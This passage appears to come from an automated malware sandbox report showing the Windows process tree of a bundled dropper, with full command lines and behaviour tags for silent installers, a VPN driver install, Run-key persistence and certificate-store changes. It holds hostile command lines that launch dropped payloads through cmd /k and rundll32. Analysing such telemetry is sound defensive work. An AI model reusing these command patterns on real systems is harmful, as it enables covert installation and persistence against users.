                                                                                                                                              • Loads dropped DLL
                                                                                                                                              PID:7732
                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\is-T0IV0.tmp\VPN.tmp
                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\is-T0IV0.tmp\VPN.tmp" /SL5="$1030A,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe" /Verysilent
                                                                                                                                        1⤵
                                                                                                                                        • Executes dropped EXE
                                                                                                                                        • Loads dropped DLL
                                                                                                                                        • Suspicious use of FindShellTrayWindow
                                                                                                                                        PID:584
                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\is-MA1DR.tmp\Setup.exe
                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\is-MA1DR.tmp\Setup.exe" /silent /subid=720
                                                                                                                                          2⤵
                                                                                                                                            PID:6096
                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\is-K643B.tmp\Setup.tmp
                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\is-K643B.tmp\Setup.tmp" /SL5="$1050A,15170975,270336,C:\Users\Admin\AppData\Local\Temp\is-MA1DR.tmp\Setup.exe" /silent /subid=720
                                                                                                                                              3⤵
                                                                                                                                              • Loads dropped DLL
                                                                                                                                              • Drops file in Program Files directory
                                                                                                                                              • Modifies system certificate store
                                                                                                                                              • Suspicious use of FindShellTrayWindow
                                                                                                                                              PID:6632
                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "
                                                                                                                                                4⤵
                                                                                                                                                  PID:5712
                                                                                                                                                  • C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
                                                                                                                                                    tapinstall.exe remove tap0901
                                                                                                                                                    5⤵
                                                                                                                                                    • Checks SCSI registry key(s)
                                                                                                                                                    PID:5504
                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                  C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "
                                                                                                                                                  4⤵
                                                                                                                                                    PID:6724
                                                                                                                                                    • C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
                                                                                                                                                      tapinstall.exe install OemVista.inf tap0901
                                                                                                                                                      5⤵
                                                                                                                                                      • Drops file in System32 directory
                                                                                                                                                      • Drops file in Windows directory
                                                                                                                                                      • Checks SCSI registry key(s)
                                                                                                                                                      PID:8648
                                                                                                                                                  • C:\Program Files (x86)\MaskVPN\mask_svc.exe
                                                                                                                                                    "C:\Program Files (x86)\MaskVPN\mask_svc.exe" uninstall
                                                                                                                                                    4⤵
                                                                                                                                                      PID:8156
                                                                                                                                                    • C:\Program Files (x86)\MaskVPN\mask_svc.exe
                                                                                                                                                      "C:\Program Files (x86)\MaskVPN\mask_svc.exe" install
                                                                                                                                                      4⤵
                                                                                                                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                      PID:9724
                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\is-TAKF7.tmp\MediaBurner2.tmp
                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\is-TAKF7.tmp\MediaBurner2.tmp" /SL5="$1031E,506086,422400,C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"
                                                                                                                                                1⤵
                                                                                                                                                • Executes dropped EXE
                                                                                                                                                • Loads dropped DLL
                                                                                                                                                PID:3700
                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\is-U267S.tmp\3377047_logo_media.exe
                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\is-U267S.tmp\3377047_logo_media.exe" /S /UID=burnerch2
                                                                                                                                                  2⤵
                                                                                                                                                  • Drops file in Drivers directory
                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                  • Adds Run key to start application
                                                                                                                                                  • Drops file in Program Files directory
                                                                                                                                                  PID:4128
                                                                                                                                                  • C:\Program Files\Windows Mail\NZMDNLPBEN\ultramediaburner.exe
                                                                                                                                                    "C:\Program Files\Windows Mail\NZMDNLPBEN\ultramediaburner.exe" /VERYSILENT
                                                                                                                                                    3⤵
                                                                                                                                                      PID:6988
                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\is-8DPKQ.tmp\ultramediaburner.tmp
                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\is-8DPKQ.tmp\ultramediaburner.tmp" /SL5="$3057C,281924,62464,C:\Program Files\Windows Mail\NZMDNLPBEN\ultramediaburner.exe" /VERYSILENT
                                                                                                                                                        4⤵
                                                                                                                                                        • Suspicious use of FindShellTrayWindow
                                                                                                                                                        PID:4152
                                                                                                                                                        • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                                                                                                                          "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
                                                                                                                                                          5⤵
                                                                                                                                                            PID:7860
                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\c0-a72b8-f01-6d693-93f5f8a3d6534\Hocaetohamo.exe
                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\c0-a72b8-f01-6d693-93f5f8a3d6534\Hocaetohamo.exe"
                                                                                                                                                        3⤵
                                                                                                                                                        • Checks computer location settings
                                                                                                                                                        PID:156
                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\1e-f9f2d-052-b218d-2d8712fb231b6\Topypepejae.exe
                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\1e-f9f2d-052-b218d-2d8712fb231b6\Topypepejae.exe"
                                                                                                                                                        3⤵
                                                                                                                                                          PID:6380
                                                                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                                                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\24mm51fa.0iy\GcleanerEU.exe /eufive & exit
                                                                                                                                                            4⤵
                                                                                                                                                              PID:8308
                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\24mm51fa.0iy\GcleanerEU.exe
                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\24mm51fa.0iy\GcleanerEU.exe /eufive
                                                                                                                                                                5⤵
                                                                                                                                                                  PID:9140
                                                                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\2ynuabnp.ltf\installer.exe /qn CAMPAIGN="654" & exit
                                                                                                                                                                4⤵
                                                                                                                                                                  PID:8536
                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\2ynuabnp.ltf\installer.exe
                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\2ynuabnp.ltf\installer.exe /qn CAMPAIGN="654"
                                                                                                                                                                    5⤵
                                                                                                                                                                      PID:9152
                                                                                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                                                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\witbmuvi.o11\ufgaa.exe & exit
                                                                                                                                                                    4⤵
                                                                                                                                                                      PID:8840
                                                                                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                                                                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\5wcz0hwa.jct\anyname.exe & exit
                                                                                                                                                                      4⤵
                                                                                                                                                                        PID:4296
                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\5wcz0hwa.jct\anyname.exe
                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\5wcz0hwa.jct\anyname.exe
                                                                                                                                                                          5⤵
                                                                                                                                                                            PID:5276
                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\5wcz0hwa.jct\anyname.exe
                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\5wcz0hwa.jct\anyname.exe" -q
                                                                                                                                                                              6⤵
                                                                                                                                                                                PID:5424
                                                                                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                                                                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\rf3xapa1.2zb\gcleaner.exe /mixfive & exit
                                                                                                                                                                            4⤵
                                                                                                                                                                              PID:8876
                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\rf3xapa1.2zb\gcleaner.exe
                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\rf3xapa1.2zb\gcleaner.exe /mixfive
                                                                                                                                                                                5⤵
                                                                                                                                                                                  PID:3836
                                                                                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                                                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\u4r0p5is.xgo\autosubplayer.exe /S & exit
                                                                                                                                                                                4⤵
                                                                                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                PID:9664
                                                                                                                                                                        • C:\Windows\system32\rundll32.exe
                                                                                                                                                                          rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                          1⤵
                                                                                                                                                                          • Process spawned unexpected child process
                                                                                                                                                                          PID:5260
                                                                                                                                                                          • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                            rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                            2⤵
                                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                                            PID:6024
                                                                                                                                                                        • C:\Windows\system32\msiexec.exe
                                                                                                                                                                          C:\Windows\system32\msiexec.exe /V
                                                                                                                                                                          1⤵
                                                                                                                                                                          • Enumerates connected drives
                                                                                                                                                                          • Drops file in Windows directory
                                                                                                                                                                          PID:180
                                                                                                                                                                          • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                            C:\Windows\syswow64\MsiExec.exe -Embedding 09F1808E6607E46893D666B725C13781 C
                                                                                                                                                                            2⤵
                                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                                            PID:8108
                                                                                                                                                                          • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                            C:\Windows\syswow64\MsiExec.exe -Embedding 05D3CEC42303A5966683FCE05C77FD0D
                                                                                                                                                                            2⤵
                                                                                                                                                                            • Blocklisted process makes network request
                                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                                            PID:5268
                                                                                                                                                                          • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                            C:\Windows\syswow64\MsiExec.exe -Embedding D377F8B5387EDE21B4DA4F9BD26E3A28 C
                                                                                                                                                                            2⤵
                                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                                            PID:8252
                                                                                                                                                                          • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                            C:\Windows\syswow64\MsiExec.exe -Embedding 8ED1B802A9E65AD8803B01C8470D6B36 C
                                                                                                                                                                            2⤵
                                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                                            PID:8644
                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe
                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe"
                                                                                                                                                                            2⤵
                                                                                                                                                                            • Adds Run key to start application
                                                                                                                                                                            PID:9880
                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\RequiredApplication_1\Cleaner_Installation.exe
                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\RequiredApplication_1\Cleaner_Installation.exe" -silent=1 -CID=717 -SID=717 -submn=default
                                                                                                                                                                              3⤵
                                                                                                                                                                              • Loads dropped DLL
                                                                                                                                                                              • Adds Run key to start application
                                                                                                                                                                              PID:7408
                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" "--anbfs"
                                                                                                                                                                                4⤵
                                                                                                                                                                                • Checks computer location settings
                                                                                                                                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                PID:8156
                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                  C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Cleaner\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Cleaner\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Cleaner\User Data" --annotation=plat=Win64 --annotation=prod=Cleaner --annotation=ver=0.0.13 --initial-client-data=0x21c,0x220,0x224,0x1f8,0x228,0x7ff96463dec0,0x7ff96463ded0,0x7ff96463dee0
                                                                                                                                                                                  5⤵
                                                                                                                                                                                    PID:2784
                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=gpu-process --field-trial-handle=1576,15105930977476801249,3801485262320007939,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8156_514183830" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1592 /prefetch:2
                                                                                                                                                                                    5⤵
                                                                                                                                                                                      PID:5648
                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1576,15105930977476801249,3801485262320007939,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8156_514183830" --mojo-platform-channel-handle=1828 /prefetch:8
                                                                                                                                                                                      5⤵
                                                                                                                                                                                        PID:9704
                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1576,15105930977476801249,3801485262320007939,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8156_514183830" --mojo-platform-channel-handle=1964 /prefetch:8
                                                                                                                                                                                        5⤵
                                                                                                                                                                                          PID:1936
                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Cleaner\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1576,15105930977476801249,3801485262320007939,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8156_514183830" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --mojo-platform-channel-handle=2448 /prefetch:1
                                                                                                                                                                                          5⤵
                                                                                                                                                                                          • Checks computer location settings
                                                                                                                                                                                          PID:2900
                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Cleaner\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1576,15105930977476801249,3801485262320007939,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8156_514183830" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --mojo-platform-channel-handle=2620 /prefetch:1
                                                                                                                                                                                          5⤵
                                                                                                                                                                                          • Checks computer location settings
                                                                                                                                                                                          PID:9916
                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1576,15105930977476801249,3801485262320007939,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8156_514183830" --mojo-platform-channel-handle=3252 /prefetch:8
                                                                                                                                                                                          5⤵
                                                                                                                                                                                            PID:8112
                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=gpu-process --field-trial-handle=1576,15105930977476801249,3801485262320007939,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8156_514183830" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3680 /prefetch:2
                                                                                                                                                                                            5⤵
                                                                                                                                                                                              PID:8176
                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1576,15105930977476801249,3801485262320007939,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8156_514183830" --mojo-platform-channel-handle=3612 /prefetch:8
                                                                                                                                                                                              5⤵
                                                                                                                                                                                                PID:6640
                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1576,15105930977476801249,3801485262320007939,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8156_514183830" --mojo-platform-channel-handle=3552 /prefetch:8
                                                                                                                                                                                                5⤵
                                                                                                                                                                                                  PID:4424
                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1576,15105930977476801249,3801485262320007939,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8156_514183830" --mojo-platform-channel-handle=2680 /prefetch:8
                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                    PID:9928
                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1576,15105930977476801249,3801485262320007939,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8156_514183830" --mojo-platform-channel-handle=3364 /prefetch:8
                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                      PID:7964
                                                                                                                                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" -NonInteractive -NoLogo -ExecutionPolicy AllSigned -Command "C:\Users\Admin\AppData\Local\Temp\AI_88E4.ps1 -paths 'C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\file_deleter.ps1','C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe','C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites' -retry_count 10"
                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                  • Blocklisted process makes network request
                                                                                                                                                                                                  PID:9780
                                                                                                                                                                                                  • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                      PID:7328
                                                                                                                                                                                              • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                1⤵
                                                                                                                                                                                                • Process spawned unexpected child process
                                                                                                                                                                                                PID:5924
                                                                                                                                                                                                • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                  • Loads dropped DLL
                                                                                                                                                                                                  PID:7388
                                                                                                                                                                                              • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                                                                                                "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                                                                                                1⤵
                                                                                                                                                                                                • Drops file in Windows directory
                                                                                                                                                                                                • Modifies Internet Explorer settings
                                                                                                                                                                                                • Modifies registry class
                                                                                                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                PID:7196
                                                                                                                                                                                              • C:\Windows\system32\browser_broker.exe
                                                                                                                                                                                                C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                                                                                                1⤵
                                                                                                                                                                                                • Modifies Internet Explorer settings
                                                                                                                                                                                                PID:8128
                                                                                                                                                                                              • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                1⤵
                                                                                                                                                                                                • Modifies registry class
                                                                                                                                                                                                • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                PID:9040
                                                                                                                                                                                              • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                1⤵
                                                                                                                                                                                                • Modifies Internet Explorer settings
                                                                                                                                                                                                • Modifies registry class
                                                                                                                                                                                                PID:4976
                                                                                                                                                                                              • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                1⤵
                                                                                                                                                                                                • Suspicious use of SetThreadContext
                                                                                                                                                                                                • Modifies registry class
                                                                                                                                                                                                PID:2240
                                                                                                                                                                                              • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                1⤵
                                                                                                                                                                                                  PID:5488
                                                                                                                                                                                                • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                  • Process spawned unexpected child process
                                                                                                                                                                                                  PID:9364
                                                                                                                                                                                                  • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                    rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                                                                    PID:9388
                                                                                                                                                                                                • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                                  c:\windows\system32\svchost.exe -k dcomlaunch -s DeviceInstall
                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                  • Drops file in Windows directory
                                                                                                                                                                                                  • Checks SCSI registry key(s)
                                                                                                                                                                                                  PID:9632
                                                                                                                                                                                                  • C:\Windows\system32\DrvInst.exe
                                                                                                                                                                                                    DrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{302e5d21-68a7-704c-b521-781def1f8326}\oemvista.inf" "9" "4d14a44ff" "0000000000000174" "WinSta0\Default" "0000000000000178" "208" "c:\program files (x86)\maskvpn\driver\win764"
                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                    • Drops file in System32 directory
                                                                                                                                                                                                    • Drops file in Windows directory
                                                                                                                                                                                                    • Checks SCSI registry key(s)
                                                                                                                                                                                                    • Modifies data under HKEY_USERS
                                                                                                                                                                                                    PID:9708
                                                                                                                                                                                                  • C:\Windows\system32\DrvInst.exe
                                                                                                                                                                                                    DrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem2.inf" "oemvista.inf:3beb73aff103cc24:tap0901.ndi:9.0.0.21:tap0901," "4d14a44ff" "0000000000000174"
                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                    • Drops file in Drivers directory
                                                                                                                                                                                                    • Drops file in System32 directory
                                                                                                                                                                                                    • Drops file in Windows directory
                                                                                                                                                                                                    • Checks SCSI registry key(s)
                                                                                                                                                                                                    PID:9988
                                                                                                                                                                                                • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                                  c:\windows\system32\svchost.exe -k netsvcs -s DsmSvc
                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                  • Checks SCSI registry key(s)
                                                                                                                                                                                                  • Modifies data under HKEY_USERS
                                                                                                                                                                                                  PID:10032
                                                                                                                                                                                                • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                                  c:\windows\system32\svchost.exe -k netsvcs -s NetSetupSvc
                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                    PID:10056
                                                                                                                                                                                                  • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                    rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                    • Process spawned unexpected child process
                                                                                                                                                                                                    PID:8324
                                                                                                                                                                                                    • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                      rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                      • Loads dropped DLL
                                                                                                                                                                                                      PID:8236
                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\3C21.exe
                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\3C21.exe
                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                    • Checks BIOS information in registry
                                                                                                                                                                                                    • Checks whether UAC is enabled
                                                                                                                                                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                    PID:9604
                                                                                                                                                                                                  • C:\Program Files (x86)\MaskVPN\mask_svc.exe
                                                                                                                                                                                                    "C:\Program Files (x86)\MaskVPN\mask_svc.exe"
                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                    • Modifies data under HKEY_USERS
                                                                                                                                                                                                    PID:6512
